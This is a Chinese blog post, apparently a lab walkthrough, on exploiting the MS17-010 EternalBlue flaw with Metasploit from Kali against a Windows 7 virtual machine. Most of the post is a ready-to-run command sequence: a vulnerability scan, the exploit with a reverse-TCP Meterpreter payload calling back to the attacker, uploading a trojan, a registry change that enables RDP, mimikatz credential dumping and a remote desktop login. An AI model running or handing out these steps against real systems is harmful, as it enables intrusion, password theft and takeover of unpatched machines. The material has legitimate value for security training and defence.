python调用msfconsole全自动永恒之蓝攻击_MSF之ms17-010永恒之蓝漏洞利用

本文详细介绍了如何在Kali Linux环境下使用msfconsole工具针对Windows 7 x64系统进行ms17-010永恒之蓝漏洞的扫描和攻击。首先,设置了实验环境,包括被攻击的Windows 7虚拟机和攻击用的Kali Linux虚拟机。然后,通过msfconsole加载辅助扫描模块,确认目标存在MS17-010漏洞。接着,利用exploit模块进行攻击,设置相关参数,并成功获取Meterpreter会话。最后,展示了通过Meterpreter进行系统信息查看、截图、创建文件夹、上传木马以及使用mimikatz获取靶机用户名和密码的过程。
摘要由CSDN通过智能技术生成

MSF之ms17-010永恒之蓝漏洞利用

准备

扫描漏洞

漏洞攻击

准备

实验准备环境:

被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙)

攻击机:虚拟机kali系统,其IP为:192.168.207.130

攻击工具:kali自带的msfconsole工具

扫描漏洞

在kali终端中输入msfconsole

msf >use auxiliary/scanner/smb/smb_ms17_010(加载扫描exp)

msf >set RHOSTS 10.101.2.11(设置被扫描IP)

msf >run(进行扫描,观察是否存在该漏洞)

8b803c24b70b52d6f8425d8809120e84.png

由上图可知,存在MS17-010漏洞

漏洞攻击

use exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)

set RHOST 10.101.2.11(被攻击机IP)

set LHOST 192.168.207.130(设置本地IP)

set LPORT 4444(设置连接端口)

set payload windows/x64/meterpreter/reverse_tcp(配置回链方式)

b6688e3e4b7f8fad90ed4989dbf3c16c.png

show options(查看配置相关信息)

ca2a21744e4b53a0dde9e5beadf0638e.png

129edd6160a0516b4361740812447863.png

meterpreter >exploit(开始攻击)

986d12fbc1cd6449b1b173b6aede893f.png

攻击成功!

sysinfo爆出系统信息

screenshot截屏,截屏后的图片存放在/root/中

meterpreter >shell,进入靶机cmd

c9a43d69f456a1c1199fa7b0de848ba5.png

此时,可以新建文件夹,然后

meterpreter >upload植入已经写好的木马!

也可以通过使用msf中的mimikatz,来爆出靶机的用户名和密码,以下是其过程:

首先

netstat -an< 查靶机端口开发情况>

880ac2162db61f18b37667746b4b2e16.png

如果没有开启3389端口,可以使用以下命令再cmd中开启:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

其次

meterpreter > load mimikatz

meterpreter > help

41511aa1c923e8487e131aaf3108ca94.png

meterpreter > msv

ace009b91f11e6c25ec5668aa7002d86.png

meterpreter > ssp

9df0473912f8c7b2613a5df3627d9f86.png

meterpreter > wdigest

8a8ec43b0427bfc61a4ff98e8916e77f.png

meterpreter > kerberos

d8c816b1743d0cf837caddf5db4c359a.png

接下来,就是远程登录靶机

rdesktop 10.101.2.11

346fbfe5f54263dbaab7c62ec6b3ff11.png

成功!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值